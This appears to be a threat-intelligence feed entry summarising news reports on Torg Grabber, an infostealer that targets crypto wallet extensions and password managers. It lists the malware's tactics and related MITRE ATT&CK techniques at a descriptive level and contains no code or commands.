Back

Torg Grabber Malware Targets 728 Crypto Wallets with Advanced Techniques

Severity: High (Score: 72.0)

Sources: Bleepingcomputer, Bitget

Summary

Torg Grabber, a new infostealer malware, is actively targeting 728 cryptocurrency wallet extensions and other applications, including password managers and communication tools. The malware employs the ClickFix technique to gain initial access and uses a PowerShell command to execute its payload. It has been developed rapidly, with 334 unique samples compiled in just three months, indicating a robust Malware-as-a-Service operation. Torg Grabber uses sophisticated methods for data exfiltration, including HTTPS connections routed through Cloudflare, and employs ChaCha20 encryption for data security. The malware is capable of stealing sensitive information such as credentials, cookies, and session tokens from various applications. Cybersecurity firm Gen Digital has linked the malware to multiple criminal actors, many associated with the Russian cybercrime ecosystem. Users of browser-based hot wallets like MetaMask and Phantom are particularly at risk, as attackers can exploit open sessions to access funds directly. The ongoing evolution of Torg Grabber suggests that its impact will continue to grow. Key Points: • Torg Grabber targets 728 cryptocurrency wallet extensions and various applications. • The malware uses advanced evasion techniques, including ClickFix and PowerShell commands. • Cybersecurity firm Gen Digital identified 334 unique samples, indicating active development.

Key Entities

  • Malware (attack_type)
  • RedLine (malware)
  • Torg Grabber (malware)
  • Vidar (malware)
  • VoidStealer (malware)
  • T1041 - Exfiltration Over C2 Channel (mitre_attack)
  • T1055 - Process Injection (mitre_attack)
  • T1059.001 - PowerShell (mitre_attack)
  • T1070.001 - Clear Windows Event Logs (mitre_attack)
  • T1567 - Exfiltration Over Web Service (mitre_attack)
  • Brave (platform)
  • Discord (platform)
  • Edge (platform)
  • Firefox (platform)
  • MetaMask (platform)
  • Chrome (tool)
  • PowerShell (tool)
  • Underground (tool)
  • Cloudflare (company)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed